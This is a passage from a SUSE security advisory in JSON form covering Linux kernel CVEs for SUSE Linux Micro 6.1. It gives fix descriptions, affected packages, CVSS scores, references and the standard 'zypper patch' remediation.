"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68245"
},
{
"cve": "CVE-2025-68249",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68249"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmost: usb: hdm_probe: Fix calling put_device() before device initialization\n\nThe early error path in hdm_probe() can jump to err_free_mdev before\n\u0026mdev-\u003edev has been initialized with device_initialize(). Calling\nput_device(\u0026mdev-\u003edev) there triggers a device core WARN and ends up\ninvoking kref_put(\u0026kobj-\u003ekref, kobject_release) on an uninitialized\nkobject.\n\nIn this path the private struct was only kmalloc\u0027ed and the intended\nrelease is effectively kfree(mdev) anyway, so free it directly instead\nof calling put_device() on an uninitialized device.\n\nThis removes the WARNING and fixes the pre-initialization error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68249",
"url": "https://www.suse.com/security/cve/CVE-2025-68249"
},
{
"category": "external",
"summary": "SUSE Bug 1255233 for CVE-2025-68249",
"url": "https://bugzilla.suse.com/1255233"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68249"
},
{
"cve": "CVE-2025-68252",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68252"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmisc: fastrpc: Fix dma_buf object leak in fastrpc_map_lookup\n\nIn fastrpc_map_lookup, dma_buf_get is called to obtain a reference to\nthe dma_buf for comparison purposes. However, this reference is never\nreleased when the function returns, leading to a dma_buf memory leak.\n\nFix this by adding dma_buf_put before returning from the function,\nensuring that the temporarily acquired reference is properly released\nregardless of whether a matching map is found.\n\nRule: add",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68252",
"url": "https://www.suse.com/security/cve/CVE-2025-68252"
},
{
"category": "external",
"summary": "SUSE Bug 1255197 for CVE-2025-68252",
"url": "https://bugzilla.suse.com/1255197"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68252"
},
{
"cve": "CVE-2025-68254",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68254"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix out-of-bounds read in OnBeacon ESR IE parsing\n\nThe Extended Supported Rates (ESR) IE handling in OnBeacon accessed\n*(p + 1 + ielen) and *(p + 2 + ielen) without verifying that these\noffsets lie within the received frame buffer. A malformed beacon with\nan ESR IE positioned at the end of the buffer could cause an\nout-of-bounds read, potentially triggering a kernel panic.\n\nAdd a boundary check to ensure that the ESR IE body and the subsequent\nbytes are within the limits of the frame before attempting to access\nthem.\n\nThis prevents OOB reads caused by malformed beacon frames.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68254",
"url": "https://www.suse.com/security/cve/CVE-2025-68254"
},
{
"category": "external",
"summary": "SUSE Bug 1255140 for CVE-2025-68254",
"url": "https://bugzilla.suse.com/1255140"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68254"
},
{
"cve": "CVE-2025-68255",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68255"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix stack buffer overflow in OnAssocReq IE parsing\n\nThe Supported Rates IE length from an incoming Association Request frame\nwas used directly as the memcpy() length when copying into a fixed-size\n16-byte stack buffer (supportRate). A malicious station can advertise an\nIE length larger than 16 bytes, causing a stack buffer overflow.\n\nClamp ie_len to the buffer size before copying the Supported Rates IE,\nand correct the bounds check when merging Extended Supported Rates to\nprevent a second potential overflow.\n\nThis prevents kernel stack corruption triggered by malformed association\nrequests.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68255",
"url": "https://www.suse.com/security/cve/CVE-2025-68255"
},
{
"category": "external",
"summary": "SUSE Bug 1255395 for CVE-2025-68255",
"url": "https://bugzilla.suse.com/1255395"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68255"
},
{
"cve": "CVE-2025-68256",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68256"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix out-of-bounds read in rtw_get_ie() parser\n\nThe Information Element (IE) parser rtw_get_ie() trusted the length\nbyte of each IE without validating that the IE body (len bytes after\nthe 2-byte header) fits inside the remaining frame buffer. A malformed\nframe can advertise an IE length larger than the available data, causing\nthe parser to increment its pointer beyond the buffer end. This results\nin out-of-bounds reads or, depending on the pattern, an infinite loop.\n\nFix by validating that (offset + 2 + len) does not exceed the limit\nbefore accepting the IE or advancing to the next element.\n\nThis prevents OOB reads and ensures the parser terminates safely on\nmalformed frames.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68256",
"url": "https://www.suse.com/security/cve/CVE-2025-68256"
},
{
"category": "external",
"summary": "SUSE Bug 1255138 for CVE-2025-68256",
"url": "https://bugzilla.suse.com/1255138"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
